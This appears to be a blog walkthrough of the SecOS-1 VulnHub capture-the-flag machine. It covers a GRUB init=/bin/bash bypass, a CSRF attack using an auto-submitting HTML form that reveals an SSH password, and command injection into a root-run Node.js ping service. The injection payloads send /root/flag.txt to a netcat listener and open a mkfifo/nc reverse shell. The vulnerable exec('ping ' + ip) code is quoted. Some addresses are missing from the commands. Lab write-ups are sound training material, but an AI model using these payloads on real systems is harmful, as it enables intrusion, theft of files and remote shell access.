# SecOS 1

ht# wget http://download.vulnhub.com/secos/SecOS-1.tar.gz
ht# md5sum SecOS-1.tar.gz 
e8c01ab49b98926a37f79e2ea414cfc5  SecOS-1.tar.gz
ht# tar xvzf SecOS-1.tar.gz
ht# virtualbox
<Run SecOS-1>

Grub solution

linux /vmlinuz-3.13.0-24-generic root=/dev/mapper/SecOS--1--vg-rot ro init=/bin/bash
root@(none):/# cat /root/flag.txt | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
root@(none):/# mount -o remout,rw /
root@(none):/# passwd root

CSRF solution

ht# nmap
22/tcp   open  ssh
8081/tcp open  blackice-icecap
ht# curl --silent
            <!--<li><a href="/hint">Wanna help?</a></li>!-->
            <li><a href="/sign-up">Sign up</a></li>
            <li><a href="/login">Login</a></li>
ht# curl --silent
        First: the admin visits the website (really) frequently
        Second: He runs it locally, on 
        Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
ht# curl --silent --request POST --data 'username=user&password=pass'
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass'
ht# curl --silent --cookie-jar uc --cookie uc
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message='
ht# cat csrf.html 
<form action='' method='post' name='form'>
<input name='password' value='pass'>
<script type='text/javascript'>document.form.submit();</script>
ht# python -m SimpleHTTPServer
Serving HTTP on port 8000 ... - - "GET /csrf.html HTTP/1.1" 200 -
ht# curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass'
ht# curl --silent --cookie-jar sc --cookie sc | grep Well
                    <td>Well, your password is.. "CrazyPassword!". So, what do you say? </td>
ht# ssh spiderman@
spiderman@'s password:CrazyPassword!
spiderman@SecOS-1:~$ crontab -e
* * * * * /opt/phantomjs/bin/phantomjs /home/spiderman/vnwa/scripts/admin.js
spiderman@SecOS-1:~$ ps axuf | grep sudo
sudo -u spiderman sh -c /usr/local/bin/node /home/spiderman/vnwa/server.js
sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
spiderman@SecOS-1:~$ cat /home/spiderman/vnwa/internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app); 

var logger = function (req, res, next) {
    console.log(req.connection.remoteAddress + " tried to access : " + req.url);
    next(); // Passing the request to the next handler in the stack.

// Configuration
app.configure(function () {
    // Session management
    app.use(express.session({secret: 'privateKeyForSession'}));
    app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
    app.use("/css", express.static(__dirname + '/public/css')); // javascript folder

    app.set('views', __dirname + '/views'); // views folder
    app.set('view engine', 'ejs'); // view engine for this projet : ejs 

    app.use(express.bodyParser()); // for POST Requests
    app.use(logger); // Here you add your logger to the stack.
    app.use(app.router); // The Express routes handler.

app.get('/', function (req, res) {
    res.render('ping.ejs', {
        isConnected: req.session.isConnected,
        isAdmin: req.session.isAdmin

// Update password
app.post('/', function (req, res) {
    ip = req.body.ip
    if (ip == "") {
        utils.redirect(req, res, '/ping-status');
    } else {
        // getting the command with req.params.command
        var child;
        // console.log(req.params.command);
        child = exec('ping ' + ip, function (error, stdout, stderr) {
            res.render('ping.ejs', {
                isConnected: req.session.isConnected,
                message: stdout,
                isAdmin: req.session.isAdmin

server.listen(9000, '', function() {
  console.log("Listening on port 9000");
spiderman@SecOS-1:~$ curl --silent --request POST --data 'ip=-c 1; nc 1234 < /root/flag.txt'
ht# ncat -l 1234 | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
spiderman@SecOS-1:~$ function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }
spiderman@SecOS-1:~$ encoded=`encode '-c 1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 1234 > /tmp/f'`
spiderman@SecOS-1:~$ curl --silent --request POST --data "ip=$encoded"
ht# ncat -l 1234
# hostname
# whoami

No comments: